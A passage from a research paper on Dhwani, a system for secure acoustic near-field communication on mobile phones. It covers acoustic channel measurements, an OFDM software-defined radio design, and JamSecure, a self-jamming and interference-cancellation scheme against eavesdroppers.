security can be potentially subverted, albeit with great difficulty,
using sophisticated directional antenna or antenna arrays. How-
ever, we believe that Dhwani raises the bar for active and passive
attackers significantly compared to the state of the art.
3.2 Acoustic Characterization
While the use of the acoustic channel for NFC offers the promise
of a broad footprint, we have to contend with the peculiarities of
both the acoustic hardware (speakers and microphones) in mobile
devices and the acoustic environment. While acoustic communi-
cation has been studied with specialized hardware and in specific
domains such as underwater communication, we are not aware of
prior work on characterizing off-the-shelf mobile devices in the
context of over-the-air communication, as we present in Section 4.
We find a high degree of ambient noise, significant ringing (rever-
berations), and highly frequency selective fading due to the electro-
mechanical nature of the speakers and microphones. These findings
inform the design of the Acoustic Software Defined Radio and also
the JamSecure technique in Dhwani.
3.3 Acoustic Software Defined Radio
Dhwani provides an Acoustic Software Defined Radio (ASDR)
service, which applications can use to transmit or receive pack-
ets. As described in Section 5, Dhwani’s ASDR implements almost
all of the functionality of a standard modern day radio, including
OFDM modulation and demodulation, error correction coding, etc.
However, a key difference in Dhwani’s ASDR compared to tradi-
tional RF radios is that it has no notion of a carrier frequency and
a separate baseband. The reason is that the ADC is able to sample
at a rate (44 KHz) that is sufficient for the entire acoustic band-
width supported by the speaker and microphone. A sampling rate
of 44 KHz allows operating (at best) in the 0-22 KHz band. Con-
sequently, Dhwani implements a carrier-less OFDM over the entire
0-22KHz band, simply suppressing (i.e., nulling) sub-carriers that
are not suitable for use, either because of the ambient noise (Sec-
tion 4.1) or because of the speaker and microphone characteristics.
3.4 JamSecure
JamSecure is a novel self-jamming technique used by the re-
ceiver in Dhwani to cloak the message being transmitted by the
transmitter, thereby preventing an attacker from receiving the mes-
sage. Figure 1 depicts the key idea behind JamSecure. Transmitter
A wishes to transmit a message M to receiver B while an eavesdrop-
per E attempts to listen to message M. As A transmits its message
with a power PAdBm, simultaneously, B jams A’s transmission by
Figure 1: JamSecure
transmitting a Pseudorandom Noise (PN) sequence with power PB
dBm. The PN sequence is generated afresh for each secure recep-
tion and is known only to B. The eavesdropper E can only overhear
the combination of the message M from A and the jamming noise
from B. The received Signal to Noise Ratio (SNR) at E will thus be
PA−PBdB. IfPBis high enough, then information-theoretically,
E will not be able to extract any useful information about M. While
B also receives a combination of its own jamming and the message
M, it performs Self Interference Cancellation (SIC), i.e.,subtracts
the (known) jamming signal from the received signal, in an attempt
to retrieve M. Since SIC is not perfect in practice, suppose that B
can cancel IC dB of its own signal. Then, the SNR seen by B is
PA−PB+ICdB. IfICis ”high enough”, B will be able to
retrieve the message M from A.
While SIC is conceptually simple, the characteristics of the acous-
tic hardware and channel make it challenging to directly perform
channel estimation for SIC. Instead, as discussed in Section 6.2, we
employ a hybrid offline-cum-online approach, which works with a
predetermined library of PN sequences, and random combinations
thereof.
As discussed in Section 8, Dhwani’s approach to physical-layer
security can be viewed as a fusion of Wyner’s wiretap model [21]
(by ensuring differential SNR for the intended receiver versus an
attacker) and Shannon’s one-time pad [20] (through the use of a
pseudo-random jamming noise). As such, this approach is not con-
fined to acoustic communication and could, in principle, be em-
ployed in other contexts too, e.g., to enable an RFID reader to se-
curely read a tag.
3.5 Other Aspects of Dhwani
We briefly touch on a couple of other elements of Dhwani’s de-
sign, including pointers to later sections for elaboration.
0 2 4 6 8 10 12 14 16 18 20
SNR [dB]Packet Success Probability
  
BPSK
QPSK
8−PSK
10−510−410−310−2101
−1
Figure 2: PSR-SNR Curves for various physical layer modulations
How much jamming is needed? For each physical-layer modula-
tion technique, the SNR at the receiver imposes a theoretical lower
bound on the Bit-Error-Rate (BER), and hence an upper bound on
the Packet Success Rate (PSR) for error-free reception. Figure 2
depicts the best possible PSR that can be achieved for a 256-bit
packet, as a function of SNR, for BPSK, QPSK, and 8-PSK. The
key observation is that in each case, PSR falls very sharply around
a certain SNR threshold; e.g., with QPSK, just a 4dB drop in SNR
(from 6dB to 2dB) causes PSR to fall by 5 orders of magnitude.
In Dhwani we need to ensure that the receiver injects enough
noise that the SNR at the eavesdropper is to the left of the chosen
curve in Figure 2 while, at the same time, the SNR at the receiver it-
self, with the benefit of SIC, is to the right. We discuss how Dhwani
achieves this balance in Section 7.2.
Scrambling the message. Receiving a message with errors might
still leak information by allowing the attacker to retrieve parts of it.
To address this issue, Dhwani uses a scrambler prior to transmitting
the message, which ensures that even a single bit of error in the
scrambled message would result in a large number of bit errors in
the unscrambled message. We repurpose AES, which is designed
for ensuring message secrecy, for scrambling instead (Section 7.1).
4. THE ACOUSTIC CHANNEL
The design of any communication system depends fundamen-
tally on the characteristics of the communication medium or the
communication channel. Specifically, for Dhwani there are three
key properties that influence its design: ambient noise ,acoustic
channel , and acoustic propagation . In this section, we characterize
these three properties, both qualitatively and quantitatively, through
measurements using various mobile devices in different settings.
4.1 Ambient Noise
A key requirement of Dhwani is that it must operate in public
spaces such as malls and cafes where the ambient (acoustic) noise
can cause significant interference. To characterize this interference,
we measured the received acoustic power in a range of environ-
ments such as malls, cafes, and office conference rooms at various
times. First we measured the noise floor of the mobile device in
an isolated, silent room. Next we collected ambient sound samples
on the same device in various venues. Figure 3 depicts the ratio of
ambient sound energy to the noise floor as a function of frequency
measured on a Samsung Galaxy S2 phone in two public venues –
payment counter at a popular mall, and a cafe during busy hours.
As seen from Figure 3, the ambient noise in both the mall and the
cafe can be significantly high – up to 25-30dB (1000 times) above
the noise floor of the phone at frequencies below 1.5KHz. Even at
frequencies up to 5KHz, the ambient interference can be as high
as 10dB (10 times). This is because while human voices rarely ex-
ceed 1KHz, several public venues (including the ones in Figure 3)
have background music or televisions which contribute to the noise
at higher frequencies. The cafe had a higher ambient noise than
the mall, not only due to human chatter but also because the back-
ground music and television sounds were louder. Beyond 6KHz
however, the ambient interference is almost close to noise levels
and becomes negligible after 8KHz. These observations imply that
6KHz forms a lower limit for the operation of Dhwani.
4.2 The Channel Transformation
When a digital acoustic signal s(k)is transmitted, a distorted
versionr(k)is received at the receiver. Specifically, if the sig-
nal is represented as a sum of Msinusoids,f1,f2,···fM(Fourier
Transform representation), then in the received signal, each of these
sinusoids experiences frequency-dependent attenuation a(fi), and
phase distortion ∆φ(fi)as follows:
s(k) =∑i=M
i=1cos(
2πfik
Fs+φi)
r(k) =∑i=M
i=1a(fi) cos(
2πfik
Fs+φi+ ∆φ(fi)) (1)Eqn 1 can be represented in complex form as:
scplx(k) =∑i=M
i=1ej2πfik
Fs+φi
rcplx(k) =∑i=M
i=1[
a(fi)ej∆φ(fi)]
ej2πfik
Fs+φi(2)
In Eqn 2, the complex number a(fi)ej∆φ(fi)is referred to as the
channel gain at frequency fi.
4.2.1 Frequency Selectivity
Frequency selectivity refers to selective attenuation of certain
frequencies in the transmitted signal. There are two key reasons
for frequency selectivity in Dhwani – microphone/speaker selectiv-
ityandmultipath .
Microphone-Speaker Frequency Selectivity. Sound is a mechan-
ical wave. Consequently, speakers and microphones have mechan-
ical components ( e.g.,vibrating membranes) required for electro-
mechanical conversion. Frequency selectivity arises because of the
inability of these components to faithfully reproduce tones of cer-
tain frequencies. Even though most mobile phones today allow for
an acoustic sampling rate of up to 44KHz, implying a maximum
operating frequency of 22KHz, their speaker/microphones compo-
nents are typically designed for human speech, and their perfor-
mance degenerates significantly at higher frequencies.
Multipath. Multipath (echo) is common in sound propagation and
leads to the superposition of several time delayed (and attenuated)
copies of the transmitted signal at the receiver. The net effect of
multi-path is spreading of the received signal in time, and con-
structive/destructive interference at various frequencies, leading to
frequency selectivity.
Examples of Acoustic Channels. Figure 4 depicts the frequency
response (the function a(f)in Eqn 1) of a Speaker-Microphone
channel for three different acoustic communication links — a Sam-
sung Galaxy S2 phone to a HP Mini laptop, a Samsung Galaxy S2
to HTC Sapphire and finally a HP Mini to a Samsung Galaxy S2.
The frequency responses were measured by transmitting tones of
frequencies between 100Hz and 20KHz, from one device to an-
other, while placing the devices within 10cm of each other. The
frequency responses in Figure 4 are normalized to the maximum
power received for any single tone during the course of the mea-
surement.
An ideal frequency response should be a line at 0dB horizontal
to the x-axis, indicating that all frequencies experience the same
overall attenuation from transmission to reception. However, Fig-
ure 4 shows that this is far from being the case. We make two key
observations from the figure:
•Attenuation at high frequencies: In all cases, we see a signifi-
cant degradation at higher frequencies, especially after 12KHz.
This implies that if we use a frequency band for communication
that spans beyond 12KHz, there will be a significant informa-
tion loss corresponding to the part of the band beyond 12KHz.
•Notches: As seen from Figure 4, the frequency responses for
all pairs of devices is extremely uneven and has deep notches
(valleys) in various parts of the spectrum, even at frequencies
much lower than 12KHz. This unevenness causes the shape of
the received waveform to be distorted relative to the transmitted
waveform, resulting in decoding errors.
Based on these observations, we conclude that Dhwani should
avoid frequencies beyond 12KHz while also working around the
notches at the lower frequencies.
Multipath vs. Speaker-Microphone Frequency Selectivity. The
frequency selectivity evident in Figure 4 arises from a combination
of both the characteristics of electro-mechanical components of the
01234567891011121314151617181920051015202530
Frequency (KHz)Received SNR [dB] 
  
MallCafeFigure 3: Spectrum of Ambient Noise
−30−25−20−15−10−50
−30−25−20−15−10−50Max−Normalized Power [dB]
0 2 4 6 810 12 14 16 18 20−30−25−20−15−10−50
Frequency [KHz]Galaxy S2 −> HP Mini  
Galaxy S2 −> HTC  
HP Mini −> Galaxy S2  Figure 4: Frequency response of acoustic chan-
nel at distance < 10cm
0 2 4 6 810 12 14 16 18 20−30−25−20−15−10−505
Frequency [KHz]Scaled Recevied Power [dB]
  
conf room
open area
cafeteriaFigure 5: Variation of Frequency Selectivity at
different locations
0 5 10 15 20 25 30−202x 104Amplitude
0 1 2 3 4−202x 104
Time [ms]Amplitude2 msRinging in the Acoustic Channel
Rise TimeTime[ms]
Figure 6: Ringing and Rise Time in the Speaker-Mic Channel
speaker/microphone, and multipath. A natural question then is to
what extent do each of these contribute to the overall frequency
selectivity. To answer this question, we measured the frequency
response for the same pair of devices (Samsung Galaxy S2 trans-
mitter to a HP Mini receiver) at three different locations — a closed
conference room, a cafeteria, and an open office area.
Figure 5 depicts the frequency response observed at each loca-
tion, in terms of the received power at various frequencies scaled
by that at 1KHz for reference. The key observation from Figure 5 is
that while there are some differences across the locations, the fre-
quency responses are largely similar. In fact, the maximum average
variation in the frequency response across these locations is about
4dB, and even this is mostly confined to frequencies greater than
12KHz. This observation suggests that the frequency selectivity re-
sults largely from the electro-mechanical components in the micro-
phone/speaker rather than multipath. One reason for this may be
that in NFC, the distance between the transmitter and the receiver
is less than 10cm, which means that the direct signal is likely to
by far dominate any echoes. In any case, frequency selectivity be-
ing dominated by static causes (i.e., the speaker and microphone)
rather than the (dynamic) environment, motivates the design of our
self-interference cancellation technique presented in Section 6.
Ringing and Rise Time. Figure 6 depicts the effect of transmitting
a 5ms long 6 KHz tone from a Samsung Galaxy S2 to a HP Mini at
a distance of a few cm. The figure depicts two temporal effects of
the acoustic channel — channel ringing andrise time . A key obser-
vation from Figure 6 is the fact that while the tone itself was trans-
mitted only for 5ms duration, the reverberations last for more than
25ms after the end of the transmission. This very long duration of
channel ringing impacts Dhwani in two ways. First, it causes Inter-
Symbol-Interference (ISI) during the communication, as discussed
in Section 5, and second, it makes Self Interference Cancelation
(SIC) extremely hard, requiring us to devise a novel SIC scheme,
as discussed in Section 6. Another interesting observation from
Figure 6 is that it takes about 2ms for the tone to gradually build up
to its maximum amplitude. Rise time reflects the reaction time of
the electro-mechanical components in the speaker/microphone, and
is one of the contributors to phase distortion, as we discuss next.4.2.2 Phase Distortion
In modulation techniques such as Phase Shift Keying (PSK) where
the phase of the received signal encodes bits of information, changes
in phases affect the ability of the receiver to decode the transmis-
sion. Furthermore, the received phase distortion also impacts the
effectiveness of SIC as discussed in Section 6. There are three rea-
sons that cause phase distortions in the received signal:
•Microphone-Speaker Characteristics: As seen in Figure 6, there
is a rise time for each tone. This rise time is frequency-dependent
and results in a frequency-dependent phase distortion.
•Multipath: As various reflected paths destructively and con-
structively add at the receiver, the net phase of a given tone in
the resulting signal can be very different from that transmitted.
•Sampling Phase Offset: This offset results from the fact that at
the ADC (in the microphone), the exact points where the signal
is sampled will in general not be same as those at the DAC (in
the speaker). Figure 7 depicts the origin of sampling offset.
A temporal offset ∆tbetween the points where ADC samples
the received waveform and those at which the DAC generated
them, induces a phase distortion of 2πf∆tat frequency f.
4.3 Acoustic Propagation
Several NFC transactions may be ongoing at the same time in ad-
jacent payment counters in a store. A key requirement for Dhwani
is that these concurrent transactions should not interfere with each
other.1Consequently, limiting the transmit power of the devices is
crucial in Dhwani.
It is well known that acoustic power decays, at a minimum, as
the square of the distance from the transmitter. In other words,
doubling distance causes a 6dB decrease in the received power.
Figure 8 depicts the decay in received SNR with distance for a
Dhwani’s transaction from a HP mini recorded by a Samsung Galaxy
S2 for 4 different volume settings – 25%, 50%, 75% and 100%. As
seen from Figure 8, the decrease in SNR conforms well to the 6dB
decay rule. In our implementation, we configured Dhwani so that
interference decreased to noise levels at a distance of 1.5m. For ex-
ample, for the HP mini this would mean a volume setting of 50%.
Since each mobile device model comes with its own hardware, this
volume setting is expected to be different, and must either be pre-
configured or adjusted as a part of Dhwani’s protocol.
5. ACOUSTIC SOFTWARE DEFINED RA-
DIO DESIGN
Dhwani implements an OFDM-based software defined radio for
enabling communication between devices. The choice of OFDM
1In current day NFC systems based on magnetic induction, such
interference is not a serious problem since magnetism decays much
faster than acoustic signals.
Figure 7: Phase Distortion due to sampling off-
set.
0 50 100 150051015202530
Distance [cm]SNR [dB]
  
Vol 25%
Vol 50%
Vol 75%
Vol 100%Figure 8: Decay of received SNR with distance
for various volume settings
012345678910111213141516171819202122−40−30−20−100Attenuation (dB)
Freq [KHz]Figure 9: Response of the Filter used in Dhwani
was motivated by the fact that it is particularly well-suited to frequency-
selective communication channels. Our OFDM radio allows the
choice of various sub-carrier modulation schemes such as BPSK,
QPSK, 16QAM, etc., and includes basic error correction coding
mechanisms. Rather than describing the well-known aspects of
OFDM, we focus in this section only on the aspects that are unique
to our implementation.
5.1 Ingress Filter
In order to be immune to typical ambient noise, the Dhwani re-
ceiver first applies a digital filter. As seen in Figure 3, and de-
scribed in Section 4, ambient noise can be as high as 25-30dB
above the noise floor at frequencies below 1.5KHz and up to 10dB
at 5KHz. The ambient noise above 6KHz is typically negligible.
Consequently, at the receiver, we use a High-Pass Finite Impulse
Response filter, which allows only frequencies greater than 6kHz.
Figure 9 shows the frequency response of the filter we used. As
seen in the figure, the filter attenuates all frequencies below 4KHz
by 30dB, thus practically annulling the effects of all ambient noise.
The filter provides close to 0dB gain for frequencies greater than
6KHz, and consequently allows higher frequencies to pass.
5.2 OFDM Design
A key difference between the radio-frequency OFDM radios and
Dhwani is the absence of a carrier wave in the latter (unlike WiFi,
for instance, which uses a 2.4GHz carrier). This is because, un-
like WiFi, the ADC (at the microphone) and DAC (at the speaker)
can sample at a rate commensurate with the entire available band-
width of 22KHz. The OFDM subcarriers are thus spread over the
entire 22KHz in our implementation. While increasing the num-
ber of subcarriers helps combat high frequency selectivity, it also
adversely effects the Peak to Average Power Ratio (PAPR). In our
implementation we choose a sub-carrier width of 171 Hz (128 sub-
carriers in the range 0-22KHz). At a sampling rate of 44KHz, this
leads to an OFDM symbol length of about 5.8ms.
Choosing an operating bandwidth. The ingress filter filters fre-
quencies below 6KHz, while the speaker/microphone do not trans-
mit/receive well at high frequencies. Consequently, a suitable op-
erating bandwidth needs to be chosen. In our implementation we
chose 1KHz of bandwidth in the range 6-7KHz as our operating
bandwidth, which is a conservative choice that works well across
all the platforms we tested.2Choosing an operating bandwidth of
6-7KHz in our system corresponds to transmitting zero energy in
the remaining sub-carriers.
Real to Complex Signal Representation. The key advantage of
the complex representation of a signal (Eqn 2) is that the phase
of each sample can be readily extracted from the ratio of its real
(in-phase) and imaginary (quadrature-phase) parts. In contrast, the
2Note that use of more advanced error correcting codes than used in
our current implementation of Dhwani may allow the use of wider
bandwidths.real representation (Eqn 1) is not amenable to such a computa-
tion. Ready access to phase is crucial for many operations such
as preamble correlation, demodulation etc.In a typical radio, the
mixer (responsible for mixing i.e.,up/down conversion from the
carrier frequency) generates both real and complex samples from
the received real signal at the carrier frequency, as a part of mixing
process. In Dhwani, however, since the sound-card provides only
16-bit real samples, the receiver does not have the luxury of being
provided complex samples.
The Dhwani receiver uses negative sideband suppression to con-
vert real signal to its complex representation. This scheme relies on
the property that the complex representation can be obtained from
its real counterpart by setting all its negative frequency components
to zero. Suppose that the received digital signal is sreal(k)and has
a total ofNsamples. The first step in this scheme is to compute
theN-point Fourier transform Sk. Then, all the negative sideband
Fourier coefficients S(k),k>N/ 2are set to zero to obtain S+(k).
Thereafter, the corresponding complex representation scplx is ob-
tained by taking an Npoint inverse Fourier transform of S+(k).
Cyclic Prefix. As depicted in Figure 6, reverberations in the acous-
tic channel last over 25ms (time taken to decay to noise floor or
0dB SNR). To combat Inter Symbol Interference (ISI) due to ring-
ing in the channel (Section 4), we experimentally found that a 4ms
long cyclic prefix worked well in practice in all environments we
tested for modulations such as BPSK and QPSK. This is because
the energy of the reverberations decay by more than 10dB after
about 4ms, which is sufficient to allow reliable detection of QPSK
symbols despite inter-symbol interference.
Preamble. For synchronizing the OFDM transmitter and receiver,
a preamble precedes each transmitted packet. For our preamble, we
used a chirp whose frequency increased from fmintofmax in the
first half and then decreased back to fminas follows,
P(t) =eiπat2for t<T
ei[φ0+fmax(t−T)−πa(t−T)2]for T <t< 2T
a=fmax−fmin
T
φ0=πaT2(3)
The reason for the choice of this chirp was twofold. First, the
chirp has a very low Peak-to-Average Power Ratio (PAPR), which
makes it easier to detect compared to a standard OFDM-based pream-
bles that have a higher PAPR. Second, experiments suggested that
having the chirp frequency to first increase and then decrease led
to a more accurate synchronization than using a chirp where fre-
quency simply increases (or decreases). In our implementation,
we chosefmax= 16 KHz andfmin= 6KHz andT= 5.81ms
(i.e., 256 samples long, given the sampling rate of 44KHz). One
problem we found was that since the amplitude of the preamble
is much larger than that of the OFDM transmission (due to low
PAPR), a 3ms cyclic prefix proved insufficient for shielding from
ISI the training symbols that immediately followed the preamble.
Consequently, we padded each preamble with a silence period of
roughly 4ms that allowed ringing of the preamble to subside sig-
nificantly and reduced channel estimation errors.
Achieved Data Rates. The data rate achieved by Dhwani depends
on the operating acoustic bandwidth (1 KHz in our current imple-
mentation), the modulation and error correction codes being used.
In our current implementation, Dhwani achieves 2.4 Kbps corre-
sponding to 8-PSK with about 80% PSR, around 95% PSR for
QPSK (1.6Kbps) and 100% for BPSK (800bps) without any error
correction. So for a short transfer of say 100 bytes, as would be typ-
ical of NFC transactions, Dhwani would take under a second. We
believe that these rates could be further improved through the use
of better error correcting codes with higher modulation schemes
such as 16-QAM or 64QAM and wider bandwidths than 1KHz.
6. JAMSECURE
As described in Section 3, in Dhwani, a receiver defeats an eaves-
dropper by jamming the transmissions from the sender. It then uses
Self-Interference Cancellation (SIC) to decode the transmission de-
spite jamming. Consequently, there are two key goals in the design
of jamming and SIC in Dhwani:
•Security: The jamming should be random and powerful enough
that an eavesdropper is unable to cancel out the jamming and
retrieve the message.
•Effective SIC Cancellation: At the same time, SIC must be
good enough for the receiver to decode the message.
In this section we start by explaining the basic techniques used for
SIC and what makes SIC in Dhwani especially difficult. We then
describe JamSecure , a novel jamming technique that allows effi-
cient SIC at the receiver while making cancellation practically im-
possible for an adversarial eavesdropper.
6.1 SIC Primer
The fundamental difficulty in performing SIC in Dhwani is that
the transmitted signal s(k), is affected by the speaker, microphone,
and multipath, altering the received signal r(k)(as discussed in
Section 4). There has been a significant amount of research in terms
of Self Interference Cancellation (SIC) in the context of full-duplex
communication for radio frequency wireless communication. We
present a quick overview of these methods and explain why these
are not suitable for Dhwani.
Analogue SIC : In [14], the transmitted signal is fed back over
a delayed path, attenuated, and then subtracted from the received
signal. A key advantage of using this approach is that it allows for
the detection of weak signals from a distant transmitter, by avoid-
ing ADC saturation [14]. However, ADC saturation is not an is-
sue in Dhwani since both the transmitter and the receiver are lo-
cated within close proximity. Further, one of the design goals of
Dhwani is that it should work on off-the-shelf components without
any hardware additions.
Channel Estimation based SIC : If the communication channel is
linear, then it can be modeled by a digital filter H(t)whose Fourier
transform corresponds to the complex channel gains a(f)e∆φ(f)
of the acoustic channel (Section 4). The key challenge then, is
to accurately estimate the channel gains of the acoustic channel.
Typically, the channel estimation is performed by the transmitter
sending a well-known training signal, pxmit(t), prior tos(t). The
receiver then computes the channel gains, and hence H(t), using
the received version, Prec(t).
In multipath environments, the length of this filter (or, equiv-
alently, the frequency resolution at which channel gains must be
estimated) corresponds to the duration for which the channel rever-
berations (ringing) lasts. As described in Section 4, reverberationslast for several tens of milliseconds (Figure 6). At a sampling rate
of 44KHz, this corresponds to a filter with a response that lasts over
a few thousand samples. The need for estimating such a large filter
accurately limits the performance of this method in Dhwani.
6.2 Design of JamSecure
As discussed in Section 4, the frequency selectivity of the acous-
tic channel in Dhwani arises from two sources — the electro-mechanical
components in the speaker/microphone, and multipath in the ambi-
ent environment. Also, as noted there, the effect of electro-mechanical
components is a significant cause for frequency selectivity. Note
that this is unlike RF, where antennas are specifically chosen not
to be frequency selective in the operating bandwidth and most of
the frequency selectivity is due to multipath. For SIC in Dhwani,
the self interference channel primarily comprises that between the
device’s own speaker and microphone, which is constant for any
given device. Consequently, if the (static) effect of the electro-
mechanical components were estimated ahead of time, say during
the initial configuration, then the task of channel estimation at run-
time becomes much easier.
Training Phase. During initial configuration as part of the train-
ing phase in JamSecure, the device transmits a library of PN se-
quencesPNi
xmit,i= 1,...,M of lengthNsamples each, with
each sequence being preceded by a preamble (a chirp, as discussed
in Section 5). The device also simultaneously records the received
versions of the corresponding PN sequences PNi
recv at the micro-
phone, using the preamble to determine the start of each received
PN sequence in the library. In the rest of the paper we shall refer to
Mas the library size .
Generating the Jamming Signal. In order to generate a jam-
ming signal, JamPNJ
xmit for theJthtransaction, the receiver
first chooses a random subset of KPN sequences from the library,
PNnJ
i
xmit,i= 1,···,K,nJ
ibeing the index of the ithrandomly
chosen PN sequence among K. Themthsample of the jamming
sequence is generated as,
JamPNJ
xmit(m) =i=K∑
i=11
KPNnJ
i
xmit(m) (4)
In the rest of the paper we shall refer to Kas the mixing factor .
If the acoustic channel remained exactly the same for every trans-
action and there were no sampling offset errors (discussed in Sec-
tion 4), then based on the linearity of the channel, the received ver-
sion of this PN sequence can be written as,
JamPNJ
recv(m) =i=K∑
i=11
KPNnJ
irecv(m) (5)
In practice, however, the received signal will be different from
Eqn 5, as the sampling offsets and preamble synchronization er-
rors are non-zero, and the multipath environment changes. Con-
sequently, as we discuss later in this section, JamSecure estimates
and compensates for these effects at runtime.
Choosing Library Size ( M) and Mixing Factor ( K).The key
objective of MandKis to thwart the eavesdropper from learn-
ing/predicting the PN sequence generated by the receiver. For ex-
ample, upon hearing the jamming sequence several times, an eaves-
dropper may learn the sequence accurately, and perform jamming
cancellation at its end. Given a large number of possible combina-
tions —MchooseK— the eavesdropper receives a new sequence
each time and it becomes hard for it to learn this library of PN se-
quences. For example, if M= 1000 andK= 5, the number of
possible sequences increases to 1015. Thus, even for small values
ofK= 5, it becomes computationally intractable for the eaves-
dropper to learn the library of sequences and perform interference
cancellation. Further, the library could be refreshed periodically to
ensure that it cannot be learned even over a long period.
Dealing with sampling offset. As described in Section 4, a sam-
pling offset of ∆tintroduces a phase error of 2πf∆tat frequency
f. Consequently, compensating for sampling offset is equivalent
to shifting the phase of the frequency component corresponding to
fin the signal’s Fourier representation by 2πf∆t. To achieve this
we first compute the Fourier transform of the received sequence and
then shift each frequency component’s phase by multiplying with
the complex cosine ej2πf∆t,fbeing the frequency. Finally, we
obtain the delayed version PNi
recv, ∆tby taking an inverse Fourier
transform. This entire procedure can be written as,
1. Compute the Npoint Fourier Transform of PNi
recv, denoted
asΦi
recv.
2. Compute sampling offset version Φi
recv, ∆t(f) = Φi
recv(f)
ej2πf∆t, herefis the frequency and spans from −Fs
2toFs
2,
Fsbeing the sampling rate.
3. Compute the Npoint Inverse Fourier Transform of Φi
recv, ∆t
to obtainPNi
recv, ∆t.
One challenge that remains is that the receiver does not know ∆t.
To address this problem, during pre-configuration time, we also
pre-compute and store several phase-shifted versions PNi
recv, ∆t
corresponding to 0<∆t <1
Fs. The best delayed version is then
recovered by comparing the first few samples (512 in our imple-
mentation) of the received jamming signal and matching it to the
closest sampling offset version corresponding to ∆toptbased on
minimizing squared error distance. The received jamming version
is then computed as,
JamPNJ
recv, ∆topt(m) =i=K∑
i=11
KPNni
recv, ∆topt(m) (6)
Dealing with Synchronization Errors. Sampling offset correction
only corrects sub-sample synchronization errors. However, in or-
der to cancel perfectly, the receiver must know the exact sample at
which it started receiving the jamming sequence. Each jamming se-
quence is preceded by a chirp preamble (as described in Section 5)
that helps the receiver synchronize itself to the jamming sequence.
This method, however, by itself sometimes results in errors of up
to a few samples. To exactly determine the offset, we compare the
received PN signal at a few different sampling offsets with the pre-
computedJamPNJ
recv, ∆tfor various values of ∆t, to correctly
identify both the start of PN sequence and the sampling offset.
Dealing with Multi-path. For dealing with multi-path, Dhwani
takes the channel estimation based approach, but with input signal
as the optimal delay-shifted version JamPNJ
recv, ∆toptof the re-
ceived signal rather than the transmitted sequence. Working with
the received signal greatly simplifies the channel estimation since
most of the channel effects due to the electro-mechanical compo-
nents of the speaker and microphone are already compensated for.
Thus, Dhwani uses the first few samples of the (known) PN se-
quence received (512 in our implementation) and computes a FIR
filterH(t)that can transform JamPNJ
recv, ∆topt(m)(which only
factors in the transformation due to static factors such as the speaker
and microphone) into the actual received samples (which is also im-
pacted by the dynamic multi-path environment). It then applies this
filter to the rest of the JamPNJ
recv, ∆topt, to transform it suitably,
and then subtract it from rest of the received jamming signal.7. PUTTING IT ALL TOGETHER
Figure 10 shows the overall architecture of Dhwani.
Transmitter Overview. As seen in Figure 10, at the transmitter,
the message is first scrambled to ensure that bit errors result in the
entire message being corrupted at the receiver. As discussed in
Section 3, this is important in order to ensure that the eavesdropper
cannot benefit from extracting parts of the message that are error
free. The OFDM radio (described in Section 5) then transmits the
scrambled message over the air using the speaker. The jamming de-
tector continuously monitors the ambient jamming level to ensure
that there is “enough” jamming to prevent any eavesdropper from
receiving the message. Upon detecting a drop in jamming levels
below a “safe” threshold, it simply directs the OFDM transmitter
to abort the transmission mid-way.
Receiver Overview. As depicted in Figure 10, the received sig-
nal first passes through the JamSecure module. The JamSecure
module transmits the jamming signal over the speakers, while si-
multaneously performing SIC on the received signal, as described
in Section 6. An additional function that the JamSecure module
performs is to estimate the appropriate jamming power needed to
simultaneously ensure that (a) an eavesdropper cannot decode the
message, (b) the receiver, with the benefit of SIC, can decode the
message, and (c) a concurrent transaction at a distance of 1.5m or
greater is not interfered with. Requirement (c) just imposes an up-
per bound on the jamming power, as discussed in Section 4.3. This
then leaves the task of balancing requirements (a) and (b). The es-
timation of jamming power for this purpose is performed with the
help of the transmitter, as described in Section 7.2. The OFDM
receiver then decodes the message, after which the descrambler re-
trieves the original message. Successful reception of a packet is
indicated by a 24-bit CRC check.
In the rest of this section we shall describe two key compo-
nents of the system that have not been described so far: the scram-
bler/descrambler and the jamming power estimator .
7.1 Scrambler-Descrambler
As noted in Section 3.5, Dhwani uses scrambling prior to encod-
ing and modulation, to amplify the impact of bit errors, thereby ren-
dering the received (scrambled) message unreadable and prevent-
ing any information leakage. While a special-purpose scrambler
could be designed, we simply re-purpose the widely-available and
highly-efficient Advanced Encryption Standard (AES) [3] scheme.
Whereas AES is typically used for encryption, with a private key
that is kept secret, we use it with a well-known key, since our ob-
jective is to achieve the desired error propagation, not secrecy. The
block-size in AES equals the key length — 128, 192, or 256 bits
— which allows the possibility of sending a short NFC message
(with padding) as a separately encrypted block or longer messages
as multiple blocks. When the receiver, with the benefit of SIC, re-
trieves an error-free copy of the scrambled message, it is able to
unscramble it with the well-known key. However, an eavesdropper,
who typically suffers several bits of error will be unable to decode
the message, even knowing the key.
7.2 Jamming Power Estimator
As described in Section 3, the message success rate at the re-
ceiver experiences a precipitous drop when the SNR falls below
a certain threshold, SNRmin. For most modulation schemes this
threshold can be determined experimentally. The jammer in Jam-
Secure should ensure the following,
•before SIC, the SNR is low enough to guarantee several bit er-
rors, and
Figure 10: Dhwani System Overall
Figure 11: Jamming Power Es-
timation
Figure 12: The Wyner
wire-tap security
model
•after SIC, the SNR is sufficient to decode the packet.
In other words, the jammer should guarantee that the SNR of the
eavesdropper is below SNRmin, while the same for the receiver is
greater than the SNRmin.
While, in our experiments we do not see a significant variation
in the amount of cancellation achieved by SIC from location to lo-
cation (as reported in Section 9), in general it may be influenced
by the environment. To safeguard against a scenario where SIC
may not perform as well as intended, for every transmission the
amount of available SIC must be estimated. Further, since the re-
ceived power levels of the transmission can vary across transmis-
sions, this should also be estimated for each transmission. In order
to accomplish this, a Dhwani transaction starts by the transmitter
transmitting some known bits to the receiver (also the jammer). The
jamming power estimator (in the receiver) uses this transmission to
determine the transmit power Pxmit in dB of the sender3. Soon af-
ter this, the jammer begins transmitting its own PN sequence, per-
forms SIC and determines the amount of cancellation ICdB that it
can obtain. Based on its estimates of IC,Pxmit andSNRmin, the
receiver then determines the PJam using the relation:
Pjam=Pxmit−SNRmin+IC. (7)
As seen from Figure 11, Pxmit−SNRmindB is the maximum
noise that the receiver can tolerate after SIC. Hence, JamSecure
can afford to jam at a power Pxmit−SNRmin+IC. The eaves-
dropper will experience a SNR of SNRmin−IC. Consequently,
as see from Figure 2 in Section 3, IC > 5dBwill ensure that the
eavesdropper cannot receive the packet since message success rate
will drop to almost 0%.
One interesting issue arises when Pxmit is so low that Pxmit
−SNRmindB is below the noise floor of the receiver. In this
case, Dhwani’s receiver itself is incapable of receiving this packet.
Further, jamming below noise floor of the receiver is not meaning-
ful. The eavesdropper however, can potentially have an ultra-low
noise receiver that might have an SNR advantage and could still de-
code the packet. In this scenario, Dhwani simply jams with a high
